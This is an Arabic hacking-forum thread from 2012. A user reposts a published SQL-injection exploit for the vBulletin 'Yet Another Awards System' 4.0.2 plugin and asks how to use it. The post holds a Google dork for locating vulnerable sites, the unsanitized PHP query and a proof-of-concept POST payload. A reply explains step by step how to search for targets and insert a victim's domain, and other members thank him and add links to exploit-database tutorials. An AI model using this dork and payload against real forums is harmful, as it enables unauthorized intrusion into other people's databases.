المساعد الشخصي الرقمي

مشاهدة النسخة كاملة : شباب بدى كيفية استغلال ثغرة System 4.0.2 SQL Injection



santos7x7x
09-28-2012, 08:40 PM
شباب احدث ثغرات المنتديات هى ثغرة vBulletin Yet Another Awards System 4.0.2 SQL Injection

وفى موقع السيكيورتى لئيت الكلام دة عن كيفية الاستغلال بس انا مش فاهم اى شئ من كل هاذا لان معظمهوا انجليزى وترجمة جوجل ما ساعدنى ياريت شباب المساعدة ضرورى

# Exploit Title: vBulletin Yet Another Awards System 4.0.2 Time Based SQL Injection 0day
# Google Dork: inurl:awards.php intext:"powered by vbulletin"
# Date: 29/08/12
# Exploit Author: Backsl@sh/Dan
# Software Link: http://www.vbulletin.org/forum/showthread.php?t=232684
# Version: 4.0.2+



The vulnerability exists within /request_award.php.

$vbulletin->input->clean_array_gpc('p', array(
'award_id' => TYPE_UINT,
//'award_request_name' => TYPE_STR,
//'award_request_recipient_name' => TYPE_STR,
'award_request_reason' => TYPE_STR,
'award_request_uid' => TYPE_UNIT,
));

> $award_request_uid = $vbulletin->GPC['award_request_uid'];
> > $db->query_write("INSERT INTO " . TABLE_PREFIX . "award_requests (award_req_uid, award_rec_uid, award_req_aid, award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '". $db->escape_string($vbulletin->GPC['award_request_reason']) ."')");

$award_request_uid is used within an insert into statement, unsanitized.


- POC -
http://[site].com/request_award.php
POST: do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit


Thanks. Have fun.

http://www.bugabuse.net/

شو معنى كل هاذا؟؟؟ مو فاهم شئ ياريت التوضيح ولو بـ فيديو لو الشرح طويل

حبوط
09-28-2012, 11:23 PM
السكربت المصاب : vBulletin
دورك استخراج المواقع المصابة بالثغرة : # Google Dork: inurl:awards.php
intext:"powered by vbulletin"
معطيك دورك اثنين تمسك واحد فيهم وتضعه في اي محرك بحث مثلااا Google
بتعمل بحث وتطلع المواقع المصابة
وقت نزول الثغرة : Date: 29/08/12
رابط السكربت المصاب :

http://www.vbulletin.org/forum/showthread.php?t=232684
اصدار السكربت المصاب : Version: 4.0.2

الكود البرمجي المصاب بالثغرة :

$vbulletin->input->clean_array_gpc('p', array(
'award_id' => TYPE_UINT,
//'award_request_name' => TYPE_STR,
//'award_request_recipient_name' => TYPE_STR,
'award_request_reason' => TYPE_STR,
'award_request_uid' => TYPE_UNIT,
));

> $award_request_uid = $vbulletin->GPC['award_request_uid'];
> > $db->query_write("INSERT INTO " . TABLE_PREFIX . "award_requests (award_req_uid, award_rec_uid, award_req_aid, award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '". $db->escape_string($vbulletin->GPC['award_request_reason']) ."')");

$award_request_uid is used within an insert into statement, unsanitized.


استغلال الثغرة :
http://[site].com/request_award.php
بدال [site] دومين الموقع


بالتوفيق ...

hack:muthm
09-29-2012, 03:35 AM
بصراحه درس مفيد

jok17
09-29-2012, 01:38 PM
machkoooooooooooooooooooooooooooooor

santos7x7x
09-30-2012, 02:00 PM
حياك الله اخى مشكور اكتر والله

سارة الغامدي
09-30-2012, 10:28 PM
يوضع في القسم المناسب

سمو الامير هكر
10-08-2012, 12:17 AM
نااااايس مفيد جداااا

QtRoNiX FoX
10-08-2012, 12:45 AM
افادك الاخ حبوط الغالي
وعلى شان بالمرة القادمة لما تشوف ثغرة بمواقع الثغرات بهذا الشكل ، ما تحتاج الى مساعدة من اي شخص وتكون انت بنفسك فاهم كل شي
تفضل اخوي هاي دروس شرح موقع الثغرات Exploit Database

شرح مفصل لموقع السكيورتي www.exploit-db.com (http://www.aljyyosh.com/vb/showthread.php?t=16954)
|ألدرس السادس والعشرون| شرح موقع الثغرات Exploit-db بالتفصيل (http://www.aljyyosh.com/vb/showthread.php?t=37097)

باتوفيق